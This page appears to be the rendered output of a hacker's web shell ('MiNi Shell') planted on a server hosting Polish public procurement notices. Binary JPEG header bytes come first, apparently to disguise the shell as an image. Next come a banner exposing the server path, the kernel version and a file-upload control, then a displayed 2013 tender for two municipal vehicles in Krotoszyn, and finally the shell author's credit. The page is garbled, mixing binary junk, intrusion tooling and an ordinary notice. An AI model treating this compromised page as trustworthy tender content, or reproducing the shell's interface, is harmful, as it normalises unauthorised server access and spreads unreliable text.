JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130725/294718-N-2013.html

<p class="kh_header"><b>Krotoszyn: Dostawa dwóch samochodów komunalnych dla PGKiM Sp. z o.o. w Krotoszynie</b><br>
<b>Numer ogłoszenia: 294718 - 2013; data zamieszczenia: 25.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej Sp. z o.o. w Krotoszynie , ul. Rawicka 41, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254233 w. 20, faks 062 7228000.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgkim.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawaw handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa dwóch samochodów komunalnych dla PGKiM Sp. z o.o. w Krotoszynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest dostawa fabrycznie nowych dwóch samochodów komunalnych na potrzeby PGKiM Sp. z o. o. w Krotoszynie stanowiących dwa odrębne zadania (zamówienia częściowe):
Część I (pierwsza):  samochód śmieciarka
Cześć II (druga): samochód bramowy
 	 Część I - samochód śmieciarka: 
 1  Charakterystyka zabudowy/parametry wymagane/dla zadania I:
zabudowa skrzyniowa z urządzeniem załadowczym tylnym, przeznaczona do zbierania 
stałych odpadów gromadzonych w pojemnikach komunalnych o pojemności 110 do 1100 dm3, surowców wtórnych i odpadów wielkogabarytowych.
skrzynia ładunkowa oraz jej podłoga o owalnych kształtach.
ściany boczne wyposażone w szyny wzdłużne
kolor skrzyni ładunkowej -RAL 2011 (pomarańcz)
pojemność skrzyni ładunkowej min. 16 m3
objętość kosza zasypowego maks. 1,8 m3
stopień ugniatania odpadów 1:6 z możliwością jego regulacji z pulpitu wyposażonego w ciekłokrystaliczny ekran z kolorowym wyświetlaczem
króciec odpływowy w wannie załadowczej.
mechanizm zgniatania liniowo-płytowy
płynna regulacja stopnia zgniotu 
układ autodiagnozy instalacji elektrycznej nadbudowy 
pulpit sterowniczy z ciekłokrystalicznym kolorowym wyświetlaczem wyposażonym w pokrętło i przyciski funkcyjne z wizualizacją pracy śmieciarki
funkcja automatycznego otrzepywania pojemników.
automatyczne ustawianie płyty wypychającej do ładowania śmieci przy opuszczaniu odwłoka
mechanizm ugniatania zsynchronizowany z mechanizmem wywrotu (automatyczne załączanie mechanizmu ugniatania po opróżnieniu pojemnika)
możliwość wysunięcia płyty wypychającej poza skrzynię ładunkową.
sterowanie urządzeniem zasypowym po obu stronach odwłoka.
oświetlenie zgodne z obowiązującymi przepisami.
siłowniki prasy ugniatającej umieszczone wewnątrz odwłoka
siłowniki podnoszenia odwłoka umieszczone na jego bocznej ścianie 
pneumatycznie sterowany mechanizm otwierania pojemników 1100
rama pośrednia na całej długości zabudowy
wanna i jej boki wykonane ze stali HARDOX 
zabudowa musi odpowiadać wytycznym 98/37/EWG, posiadać znak CE i być wykonana zgodnie z normą PN-EN 1501-1
rok produkcji zabudowy 2013
świadectwo homologacji lub odstępstwo od homologacji dla kompletnego pojazdu 
podłoga skrzyni ładunkowej o grubości blachy min 4 mm i twardości min. 400 HB
ściany skrzyni ładunkowej o grubości blachy min 3 mm i twardości min. 400 HB
wanna załadowcza o grubości blachy min 6 mm i twardości min. 400 HB
uszczelnienie płyty wypychające (podłoga, ściany, dach)
napęd urządzenia hydrauliczny od odsilnikowej przystawki poboru mocy 
ciśnienie w układzie hydraulicznym max 210 bar
pompa hydrauliczna o zmiennej wydajności 
obraz z kamery wyświetlany na pulpicie sterującym (brak osobnego monitora do kamery)
licznik podnoszenia odwłoka, cykli mechanizmu ugniatania, cykli mechanizmu wywrotu
dwie prędkości podnoszenia pojemników (małe i duże) z możliwością płynnej regulacji każdej z nich.
zabudowa powinna posiadać centralny układ smarowania od 19 do 25 pkt smarnych
 1.1  
 2  Charakterystyka podwozia (parametry wymagane)dla cz. I:
 2.1  Dopuszczalna masa całkowita 18 ton 
 2.2  Podwozie fabrycznie nowe - produkcja 2013 
 2.3  Rozstaw osi 3800-4000mm 
 2.4  Silnik: 
wysokoprężny min. 250 KM, Common-Rail 
silnik spełniający normy emisji spalin EURO 5 bez stosowania AdBlue 
maksymalny moment obrotowy silnika min. 1000 Nm 
skrzynia biegów zautomatyzowana bez pedału sprzęgła, min. 12-biegowa 
dodatkowy podgrzewany filtr paliwa z separatorem wody 
płomieniowe urządzenie rozruchowe 
wydech wyprowadzony do góry 
 2.5  Oś przednia: 
-przednie zawieszenie resory paraboliczne min. 7,5 ton 
-stabilizator osi przedniej 
 2.6  Osie tylne: 
tylne zawieszenie pneumatyczne min. 11,5 ton 
stabilizator osi tylnej 
blokada mechanizmu różnicowego osi tylnej 
ECAS - regulacja wysokości zawieszenia 
 2.7  Przystawki odbioru mocy: 
przystawka odbioru mocy odsilnikowa, niezależna od sprzęgła i skrzyni biegów 
 2.8  Układ hamulcowy: 
hamulec osi przedniej i tylnej - tarczowe 
układ hamulcowy z systemem ABS 
system ASR i ESP 
hamulec silnikowy 
osuszacz powietrza podgrzewany 
hamulec przystankowy dla śmieciarki z ograniczeniem dot. cofania wg DIN EN 1501-01  
 2.9  Układ kierowniczy: 
układ kierowniczy ze wspomaganiem 
koło kierownicy z regulowaną wysokością i pochyleniem 
fabryczny immobiliser 
 2.10  Układ elektryczny: 
akumulatory 12V minimum 150Ah 2 szt. 
mechaniczny wyłącznik akumulatorów 
 2.11  Zbiornik paliwa min. 180 litrów z zamykanym korkiem 
 2.12  Koła 22,5 z oponami 315/80R, tarcze kół 10 - otworowe 
 2.13  Kabina: 
kabina dzienna w kolorze białym, trzymiejscowa 
siedzenie kierowcy z zawieszeniem pneumatycznym 
klimatyzacja z automatyczną regulacją temperatury 
ogrzewane i elektrycznie regulowane lusterka wsteczne zgodne z obowiązującymi przepisami ruchu drogowego 
centralny zamek 
elektrycznie sterowane szyby 
oświetlenie zgodne z obowiązującymi przepisami ruchu drogowego 
światła do jazdy dziennej 
regulacja zasięgu świateł 
tempomat 
komputer pokładowy 
tachograf cyfrowy 
radio CD 
 2.14  Oferent musi posiadać wdrożony i certyfikowany system zarządzania jakością ISO w zakresie projektowania, produkcji, sprzedaży i serwisowania urządzeń komunalnych - kopia załączona do oferty.  
 2.15  Serwis stacjonarny do 100 km od miejsca zamawiającego, 
 2.16  Pierwszy przegląd serwisowy zawarty w cenie oferowanego pojazdu,
 	Część II - samochód bramowy: 
 3  Charakterystyka zabudowy/parametry wymagane/dla zadania II:
 3.1  Nominalne obciążenie ramion złożonych (transport kontenera typu MULDA)- 2.2 m - min. 6 t
 3.2  Nominalne obciążenie ramion rozłożonych (transport kontenera typu KP-7)- 2.8 m - min. 4,5 t
 3.3  Nominalne obciążenie ramion rozłożonych - 2.68 m - min. 2,6 t
 3.4  Długość zabudowy 3,9 - 4,0 m
 3.5  Czas załadunku kontenera max. 50 s
 3.6  Czas rozładunku kontenera  max. 60 s
 3.7  Czas wysuwu ramion max. 16 s
 3.8  Masa urządzenia bramowego max. 1,5 t.
 3.9  Długość kontenera 3,3 - 3,6 m
 3.10  Rodzaj kontenera: typu KP7 i MULDA
 3.11  Sterowanie ręczne z zewnątrz z lewej strony
 3.12  Wyposażenie podstawowe:
ramiona teleskopowe bez belki poprzecznej
dwa haki blokujące
rozdzielacz zamontowany na zewnątrz pojazdu
filtr wysokociśnieniowy ze wskaźnikiem zanieczyszczenia
zbiornik oleju hydraulicznego
zawór odcinający przy zbiorniku oleju
napełnienie układu olejem hydraulicznym
układ sterowania urządzeniem 
zawiesia łańcuchowe z regulacją po dwa na każdym ramieniu służące do zawieszenia kontenera, z atestem
lakierowanie w kolorze RAL 2011 (pomarańcz)
z tyłu urządzenia bramowego dwie podpory odciążające tylną os
czerwono-białe odblaski wg DIN 30710
 4  Charakterystyka podwozia (parametry wymagane)dla cz. II:
 4.1  Dopuszczalna masa całkowita 12 ton 
 4.2  Podwozie fabrycznie nowe - produkcja 2013 
 4.3  Rozstaw osi 3600-3700mm 
 4.4  Silnik: 
wysokoprężny min. 180 KM, Common-Rail 
silnik spełniający normy emisji spalin EURO 5 bez stosowania AdBlue 
maksymalny moment obrotowy silnika min. 700 Nm 
skrzynia biegów manualna,
dodatkowy podgrzewany filtr paliwa z separatorem wody 
płomieniowe urządzenie rozruchowe 
wydech wyprowadzony do góry 
 4.5  Oś przednia: 
-przednie zawieszenie paraboliczne min. 4,7 ton 
-stabilizator osi przedniej 
 4.6  Osie tylne: 
tylne zawieszenie paraboliczne min. 8,7 ton 
stabilizator osi tylnej 
bez blokady mechanizmu różnicowego osi tylnej 
 4.7  Przystawki odbioru mocy: 
przystawka odbioru mocy bez kołnierza, prawa leżąca
 4.8  Układ hamulcowy: 
hamulec osi przedniej i tylnej - tarczowe 
układ hamulcowy z systemem ABS   
osuszacz powietrza 
 4.9  Układ kierowniczy: 
układ kierowniczy ze wspomaganiem 
koło kierownicy z regulowaną wysokością i pochyleniem 
fabryczny immobiliser 
 4.10  Układ elektryczny: 
akumulatory 12V minimum 150Ah 2 szt. 
mechaniczny wyłącznik akumulatorów 
 4.11  Zbiornik paliwa min. 140 litrów z zamykanym korkiem 
 4.12  Koła 17,5 z oponami 265/70R, tarcze kół 6 - otworowe 
 4.13  Kabina: 
kabina dzienna w kolorze białym, trzymiejscowa 
siedzenie kierowcy z zawieszeniem pneumatycznym 
ogrzewane i elektrycznie regulowane lusterka wsteczne zgodne z obowiązującymi przepisami ruchu drogowego 
centralny zamek 
elektrycznie sterowane szyby 
oświetlenie zgodne z obowiązującymi przepisami ruchu drogowego 
światła do jazdy dziennej 
regulacja zasięgu świateł 
tempomat 
komputer pokładowy 
tachograf cyfrowy 
radio CD 
 4.14  Serwis stacjonarny do 100 km od miejsca zamawiającego, 
 4.15  Pierwszy przegląd serwisowy zawarty w cenie oferowanego pojazdu,
 5  Warunki gwarancji dla zadania I i II: 
 5.1  Podwozie: min. 12 miesięcy na całe podwozie i min. 24 miesiące na układ napędowy
 5.2  Nadwozie: min. 24 miesiące na elementy strukturalne i 12 miesięcy na elementy hydrauliki siłowej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.45.11-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Cześć I:  Dostawa samochodu komunalnego - śmieciarka: 10.000,00 zł. 
(słownie: dziesięć tysięcy złotych).
Część II: Dostawa samochodu komunalnego - samochód bramowy 	6.000,00 zł. (słownie: sześć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie wymagał potwierdzenia spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, następujących głównych zadań (dostaw / usług):
Cz. I:  min. 3 zadań dotyczących dostawie samochodów komunalnych -śmieciarek o wartości nie mniejszej niż 350.000 PLN (brutto) każde zadanie,
Cz. II:  min. 3 zadań dotyczących dostawie samochodów komunalnych -bramowych i/lub hakowców o wartości nie mniejszej niż 200.000 PLN (brutto) każde zadanie. Wykonawca spełni warunek, jeżeli wykaże wykonanie w/w dostaw oraz załączy dowody, czy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie wymagał potwierdzenia spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie będzie wymagał potwierdzenia spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże posiadanie ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzenia działalności  związanej z przedmiotem zamówienia na minimalną sumę ubezpieczenia 100 000 PLN. Wykonawca spełni warunek, jeżeli jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na w/w kwotę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty CoC (świadectwo zgodności WE) potwierdzający uzyskanie europejskiego świadectwa homologacji  (pojazdy  powinny być homologowane wg. Dyrektywy 2007/46/WE) zgodny z nowelizacją prawa o ruchu drogowym (tekst jednolity: Dz. U. 2012 r. poz. 1137 z późn. zmianami) , z dnia. 22 czerwca 2013 r. Dokument  ten będzie stanowić załącznik nr 7 do oferty. 
W przypadku, gdy Wykonawcę reprezentuje pełnomocnik : pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy. W przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa do reprezentowania Wykonawców. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumenty o których mowa w pkt IX. C SIWZ każdy z Wykonawców składa osobno.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wykonawca zobowiązany jest do podpisania umowy na warunkach podanych w projekcie umowy stanowiącym załącznik nr A do SIWZ.
Zakazuje się zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem postanowień ust. 3.
Zgodnie z art. 144 ustawy PZP Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku:
a) działania siły wyższej, mającej bezpośredni wpływ na termin wykonania dostawy (np. klęski żywiołowe, strajki,),
b) zmiany danych podmiotowych Zamawiającego i Wykonawcy,
c) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiany stawek podatku VAT.
2.Wskazane powyżej zmiany mogą zostać wprowadzone, jedynie w przypadku, jeżeli obydwie strony umowy zgodnie uznają, że zaszły wskazane okoliczności oraz wprowadzenie zmian jest konieczne dla prawidłowej realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgkim.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PGKiM Sp. z o.o. 63-700 Krotoszyn ul. Rawicka 41 pokój nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2013 godzina 10:00, miejsce: PGKiM Sp. z o.o.  63-700 Krotoszyn ul. Rawicka 41 Dział Techniczny pokój nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com